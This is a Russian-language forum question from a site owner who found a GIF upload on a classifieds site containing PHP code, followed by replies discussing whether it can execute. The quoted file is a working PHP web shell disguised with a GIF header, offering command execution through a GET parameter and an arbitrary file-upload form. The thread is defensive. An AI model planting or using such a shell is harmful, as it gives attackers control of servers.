На сайт с объявлениями один хаккер загрузил gif файл с кодом:
GIF89GMZ
<? system($_GET[a]); ?>
<form action="" method="post" enctype="multipart/form-data">
<input name="ufile" type="file" /><input type="submit" name="Submit" />
</form>
<?php
if(isSet($_POST['Submit'])) {
$path= "./".$_FILES['ufile']['name'];if(copy($_FILES['ufile']['tmp_name'], $path)) {
echo"ok";
}
else{
echo"Error";
}
}
?>
<? system($_GET[a]); ?>
<form action="" method="post" enctype="multipart/form-data">
<input name="ufile" type="file" /><input type="submit" name="Submit" />
</form>
<?php
if(isSet($_POST['Submit'])) {
$path= "./".$_FILES['ufile']['name'];if(copy($_FILES['ufile']['tmp_name'], $path)) {
echo"ok";
}
else{
echo"Error";
}
}
?>
Насколько это опасно?
Комментарии
Ну дак проверь сам. Вызови файл с GET параметром "а" и посмотри, появится форма или нет. Если нет, значит веб-сервер блокирует выполнение такого кода
Вот только это может где-то инклюдиться, а не просто вызываться...
Это поле изображения в профиле пользователя. Как заинклудить?
Через views? 🤔
Это шутка? Если нет - поле действительно выводиться во вьюхе.
Какой-нибудь код в базе, любой другой вектор атаки, в общем.
Просто вывода как поля с картинкой во вьюхе не достаточно, всё же для применения...
А как его вызвать с GET параметром?
http://myhost.loc:port/path/to/file.gif?a=something
И что должно быть на месте port и something ?
Это просто пример url
а как в этот пример вписать get параметр?
Погугли, пожалуйста, что такое get-параметр и соотнеси полученную информацию с ответом юзера Andruxa